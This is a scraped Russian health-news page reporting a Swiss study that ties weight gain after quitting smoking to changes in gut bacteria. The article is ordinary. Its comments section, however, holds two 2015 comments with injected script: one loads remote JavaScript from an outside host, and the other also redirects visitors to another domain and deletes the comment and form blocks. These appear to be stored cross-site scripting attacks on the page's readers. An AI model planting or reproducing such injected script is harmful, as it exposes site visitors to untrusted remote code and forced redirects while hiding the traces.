Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бросили курить? Поправили...  >>  Бросили курить? Поправились? Во всем виноваты бактерии!
 
Обратная связь
 

Бросили курить? Поправились? Во всем виноваты бактерии!

Размер шрифта
07 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие люди замечали, что, бросив курить, они приобретали не только ощущение свободы, свежее дыхание и другие суперприятные бонусы, но и пару-тройку лишних килограмм в нагрузку. Эдакая ложка дегтя, но она весьма горька на вкус. Считается, что это связано с повышением аппетита, однако ученые из Швейцарии пришли к другим, более неожиданным выводам.

Бросили курить? Поправились? Во всем виноваты бактерии!

Бросая курить, человек в среднем поправляется на семь килограмм. При этом масса тела повышается, даже если количество потребляемых калорий остается на прежнем уровне. Какова же причина этой прибавки в весе?

Оказывается, повышение веса связано с изменением состава кишечной микрофлоры! Ученые из Цюрихского университета обнаружили, что у человека, бросившего курить, в пищеварительном тракте активизируются те же самые штаммы, которые обычно бесчинствуют в кишечнике людей с ожирением.

Команда ученых во главе с Герхардом Роглером проводила анализ образцов стула от двадцати человек на протяжении девяти недель. Среди испытуемых пятеро курили, пятеро – нет, остальные десять расстались с пагубной привычкой спустя неделю после начала экперимента.

Микробный состав стула у людей из первых двух категорий отличался крайне незначительно, тогда как у тех, кто бросил, выявлялись разительные изменения в микрофлоре. В частности, отмечалось увеличение числа бактерий семейств Proteobacteria и Bacteroidetes. На фоне этих изменений в составе стула ученые констатировали среднюю прибавку в весе на 2,2 килограмма, при том что рацион питания в целом остался нетронутым.

«Полученные нами результаты находятся в соответствии с уже имеющимися данными из экспериментов на лабораторных животных», – рассказывает Роглер. «В прошлом ученые трансплантировали фекалии ожиревших мышей в кишечник мышей здоровых, наблюдая в итоге повышение массы тела у последних. По всей видимости, новые бактерии способствовали более тщательному перевариванию пищи и, как следствие, повышению КПД процесса в целом».

Авторы убеждены, что те же самые процессы происходят в кишечнике людей, которые бросили курить.

Впрочем, едва ли эта досадная неприятность может стать поводом продолжить губительное вдыхание гнусных токсических продуктов сгорания табака. В конце концов, избавиться от лишнего веса – не проблема. Особенно, если вы вооружитесь бесценными знаниями, которые хранятся на страницах нашего специального проекта «Сбрось лишнее»!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.